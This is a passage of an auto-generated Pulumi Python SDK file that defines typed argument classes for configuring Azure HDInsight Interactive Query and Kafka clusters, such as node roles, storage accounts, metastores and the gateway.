@pulumi.input_type
class InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs:
def __init__(__self__, *,
days: pulumi.Input[Sequence[pulumi.Input[str]]],
target_instance_count: pulumi.Input[int],
time: pulumi.Input[str]):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] days: The days of the week to perform autoscale.
:param pulumi.Input[int] target_instance_count: The number of worker nodes to autoscale at the specified time.
:param pulumi.Input[str] time: The time of day to perform the autoscale in 24hour format.
"""
pulumi.set(__self__, "days", days)
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "time", time)
@property
@pulumi.getter
def days(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The days of the week to perform autoscale.
"""
return pulumi.get(self, "days")
@days.setter
def days(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "days", value)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of worker nodes to autoscale at the specified time.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter
def time(self) -> pulumi.Input[str]:
"""
The time of day to perform the autoscale in 24hour format.
"""
return pulumi.get(self, "time")
@time.setter
def time(self, value: pulumi.Input[str]):
pulumi.set(self, "time", value)
@pulumi.input_type
class InteractiveQueryClusterRolesZookeeperNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class InteractiveQueryClusterSecurityProfileArgs:
def __init__(__self__, *,
aadds_resource_id: pulumi.Input[str],
domain_name: pulumi.Input[str],
domain_user_password: pulumi.Input[str],
domain_username: pulumi.Input[str],
ldaps_urls: pulumi.Input[Sequence[pulumi.Input[str]]],
msi_resource_id: pulumi.Input[str],
cluster_users_group_dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] aadds_resource_id: The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_name: The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_user_password: The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_username: The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ldaps_urls: A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
:param pulumi.Input[str] msi_resource_id: The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cluster_users_group_dns: A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "aadds_resource_id", aadds_resource_id)
pulumi.set(__self__, "domain_name", domain_name)
pulumi.set(__self__, "domain_user_password", domain_user_password)
pulumi.set(__self__, "domain_username", domain_username)
pulumi.set(__self__, "ldaps_urls", ldaps_urls)
pulumi.set(__self__, "msi_resource_id", msi_resource_id)
if cluster_users_group_dns is not None:
pulumi.set(__self__, "cluster_users_group_dns", cluster_users_group_dns)
@property
@pulumi.getter(name="aaddsResourceId")
def aadds_resource_id(self) -> pulumi.Input[str]:
"""
The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "aadds_resource_id")
@aadds_resource_id.setter
def aadds_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "aadds_resource_id", value)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Input[str]:
"""
The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="domainUserPassword")
def domain_user_password(self) -> pulumi.Input[str]:
"""
The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_user_password")
@domain_user_password.setter
def domain_user_password(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_user_password", value)
@property
@pulumi.getter(name="domainUsername")
def domain_username(self) -> pulumi.Input[str]:
"""
The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_username")
@domain_username.setter
def domain_username(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_username", value)
@property
@pulumi.getter(name="ldapsUrls")
def ldaps_urls(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ldaps_urls")
@ldaps_urls.setter
def ldaps_urls(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "ldaps_urls", value)
@property
@pulumi.getter(name="msiResourceId")
def msi_resource_id(self) -> pulumi.Input[str]:
"""
The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "msi_resource_id")
@msi_resource_id.setter
def msi_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "msi_resource_id", value)
@property
@pulumi.getter(name="clusterUsersGroupDns")
def cluster_users_group_dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "cluster_users_group_dns")
@cluster_users_group_dns.setter
def cluster_users_group_dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "cluster_users_group_dns", value)
@pulumi.input_type
class InteractiveQueryClusterStorageAccountArgs:
def __init__(__self__, *,
is_default: pulumi.Input[bool],
storage_account_key: pulumi.Input[str],
storage_container_id: pulumi.Input[str]):
"""
:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_account_key: The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "storage_account_key", storage_account_key)
pulumi.set(__self__, "storage_container_id", storage_container_id)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="storageAccountKey")
def storage_account_key(self) -> pulumi.Input[str]:
"""
The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_key")
@storage_account_key.setter
def storage_account_key(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_account_key", value)
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@storage_container_id.setter
def storage_container_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_container_id", value)
@pulumi.input_type
class InteractiveQueryClusterStorageAccountGen2Args:
def __init__(__self__, *,
filesystem_id: pulumi.Input[str],
is_default: pulumi.Input[bool],
managed_identity_resource_id: pulumi.Input[str],
storage_resource_id: pulumi.Input[str]):
"""
:param pulumi.Input[str] filesystem_id: The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
:param pulumi.Input[str] managed_identity_resource_id: The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_resource_id: The ID of the Storage Account. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "filesystem_id", filesystem_id)
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "managed_identity_resource_id", managed_identity_resource_id)
pulumi.set(__self__, "storage_resource_id", storage_resource_id)
@property
@pulumi.getter(name="filesystemId")
def filesystem_id(self) -> pulumi.Input[str]:
"""
The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "filesystem_id")
@filesystem_id.setter
def filesystem_id(self, value: pulumi.Input[str]):
pulumi.set(self, "filesystem_id", value)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="managedIdentityResourceId")
def managed_identity_resource_id(self) -> pulumi.Input[str]:
"""
The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "managed_identity_resource_id")
@managed_identity_resource_id.setter
def managed_identity_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "managed_identity_resource_id", value)
@property
@pulumi.getter(name="storageResourceId")
def storage_resource_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_resource_id")
@storage_resource_id.setter
def storage_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_resource_id", value)
@pulumi.input_type
class KafkaClusterComponentVersionArgs:
def __init__(__self__, *,
kafka: pulumi.Input[str]):
"""
:param pulumi.Input[str] kafka: The version of Kafka which should be used for this HDInsight Kafka Cluster. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "kafka", kafka)
@property
@pulumi.getter
def kafka(self) -> pulumi.Input[str]:
"""
The version of Kafka which should be used for this HDInsight Kafka Cluster. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "kafka")
@kafka.setter
def kafka(self, value: pulumi.Input[str]):
pulumi.set(self, "kafka", value)
@pulumi.input_type
class KafkaClusterGatewayArgs:
def __init__(__self__, *,
password: pulumi.Input[str],
username: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] password: The password used for the Ambari Portal.
:param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
:param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
if enabled is not None:
warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The password used for the Ambari Portal.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The username used for the Ambari Portal. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class KafkaClusterMetastoresArgs:
def __init__(__self__, *,
ambari: Optional[pulumi.Input['KafkaClusterMetastoresAmbariArgs']] = None,
hive: Optional[pulumi.Input['KafkaClusterMetastoresHiveArgs']] = None,
oozie: Optional[pulumi.Input['KafkaClusterMetastoresOozieArgs']] = None):
"""
:param pulumi.Input['KafkaClusterMetastoresAmbariArgs'] ambari: An `ambari` block as defined below.
:param pulumi.Input['KafkaClusterMetastoresHiveArgs'] hive: A `hive` block as defined below.
:param pulumi.Input['KafkaClusterMetastoresOozieArgs'] oozie: An `oozie` block as defined below.
"""
if ambari is not None:
pulumi.set(__self__, "ambari", ambari)
if hive is not None:
pulumi.set(__self__, "hive", hive)
if oozie is not None:
pulumi.set(__self__, "oozie", oozie)
@property
@pulumi.getter
def ambari(self) -> Optional[pulumi.Input['KafkaClusterMetastoresAmbariArgs']]:
"""
An `ambari` block as defined below.
"""
return pulumi.get(self, "ambari")
@ambari.setter
def ambari(self, value: Optional[pulumi.Input['KafkaClusterMetastoresAmbariArgs']]):
pulumi.set(self, "ambari", value)
@property
@pulumi.getter
def hive(self) -> Optional[pulumi.Input['KafkaClusterMetastoresHiveArgs']]:
"""
A `hive` block as defined below.
"""
return pulumi.get(self, "hive")
@hive.setter
def hive(self, value: Optional[pulumi.Input['KafkaClusterMetastoresHiveArgs']]):
pulumi.set(self, "hive", value)
@property
@pulumi.getter
def oozie(self) -> Optional[pulumi.Input['KafkaClusterMetastoresOozieArgs']]:
"""
An `oozie` block as defined below.
"""
return pulumi.get(self, "oozie")
@oozie.setter
def oozie(self, value: Optional[pulumi.Input['KafkaClusterMetastoresOozieArgs']]):
pulumi.set(self, "oozie", value)
@pulumi.input_type
class KafkaClusterMetastoresAmbariArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class KafkaClusterMetastoresHiveArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class KafkaClusterMetastoresOozieArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class KafkaClusterMonitorArgs:
def __init__(__self__, *,
log_analytics_workspace_id: pulumi.Input[str],
primary_key: pulumi.Input[str]):
"""
:param pulumi.Input[str] log_analytics_workspace_id: The Operations Management Suite (OMS) workspace ID.
:param pulumi.Input[str] primary_key: The Operations Management Suite (OMS) workspace key.
"""
pulumi.set(__self__, "log_analytics_workspace_id", log_analytics_workspace_id)
pulumi.set(__self__, "primary_key", primary_key)
@property
@pulumi.getter(name="logAnalyticsWorkspaceId")
def log_analytics_workspace_id(self) -> pulumi.Input[str]:
"""
The Operations Management Suite (OMS) workspace ID.
"""
return pulumi.get(self, "log_analytics_workspace_id")
@log_analytics_workspace_id.setter
def log_analytics_workspace_id(self, value: pulumi.Input[str]):
pulumi.set(self, "log_analytics_workspace_id", value)
@property
@pulumi.getter(name="primaryKey")
def primary_key(self) -> pulumi.Input[str]:
"""
The Operations Management Suite (OMS) workspace key.
"""
return pulumi.get(self, "primary_key")
@primary_key.setter
def primary_key(self, value: pulumi.Input[str]):
pulumi.set(self, "primary_key", value)
@pulumi.input_type
class KafkaClusterRestProxyArgs:
def __init__(__self__, *,
security_group_id: pulumi.Input[str]):
"""
:param pulumi.Input[str] security_group_id: The Azure Active Directory Security Group ID.
"""
pulumi.set(__self__, "security_group_id", security_group_id)
@property
@pulumi.getter(name="securityGroupId")
def security_group_id(self) -> pulumi.Input[str]:
"""
The Azure Active Directory Security Group ID.
"""
return pulumi.get(self, "security_group_id")
@security_group_id.setter
def security_group_id(self, value: pulumi.Input[str]):
pulumi.set(self, "security_group_id", value)
@pulumi.input_type
class KafkaClusterRolesArgs:
def __init__(__self__, *,
head_node: pulumi.Input['KafkaClusterRolesHeadNodeArgs'],
worker_node: pulumi.Input['KafkaClusterRolesWorkerNodeArgs'],
zookeeper_node: pulumi.Input['KafkaClusterRolesZookeeperNodeArgs'],
kafka_management_node: Optional[pulumi.Input['KafkaClusterRolesKafkaManagementNodeArgs']] = None):
"""
:param pulumi.Input['KafkaClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
:param pulumi.Input['KafkaClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
:param pulumi.Input['KafkaClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
:param pulumi.Input['KafkaClusterRolesKafkaManagementNodeArgs'] kafka_management_node: A `kafka_management_node` block as defined below.
"""
pulumi.set(__self__, "head_node", head_node)
pulumi.set(__self__, "worker_node", worker_node)
pulumi.set(__self__, "zookeeper_node", zookeeper_node)
if kafka_management_node is not None:
pulumi.set(__self__, "kafka_management_node", kafka_management_node)
@property
@pulumi.getter(name="headNode")
def head_node(self) -> pulumi.Input['KafkaClusterRolesHeadNodeArgs']:
"""
A `head_node` block as defined above.
"""
return pulumi.get(self, "head_node")
@head_node.setter
def head_node(self, value: pulumi.Input['KafkaClusterRolesHeadNodeArgs']):
pulumi.set(self, "head_node", value)
@property
@pulumi.getter(name="workerNode")
def worker_node(self) -> pulumi.Input['KafkaClusterRolesWorkerNodeArgs']:
"""
A `worker_node` block as defined below.
"""
return pulumi.get(self, "worker_node")
@worker_node.setter
def worker_node(self, value: pulumi.Input['KafkaClusterRolesWorkerNodeArgs']):
pulumi.set(self, "worker_node", value)
@property
@pulumi.getter(name="zookeeperNode")
def zookeeper_node(self) -> pulumi.Input['KafkaClusterRolesZookeeperNodeArgs']:
"""
A `zookeeper_node` block as defined below.
"""
return pulumi.get(self, "zookeeper_node")
@zookeeper_node.setter
def zookeeper_node(self, value: pulumi.Input['KafkaClusterRolesZookeeperNodeArgs']):
pulumi.set(self, "zookeeper_node", value)
@property
@pulumi.getter(name="kafkaManagementNode")
def kafka_management_node(self) -> Optional[pulumi.Input['KafkaClusterRolesKafkaManagementNodeArgs']]:
"""
A `kafka_management_node` block as defined below.
"""
return pulumi.get(self, "kafka_management_node")
@kafka_management_node.setter
def kafka_management_node(self, value: Optional[pulumi.Input['KafkaClusterRolesKafkaManagementNodeArgs']]):
pulumi.set(self, "kafka_management_node", value)
@pulumi.input_type
class KafkaClusterRolesHeadNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class KafkaClusterRolesKafkaManagementNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
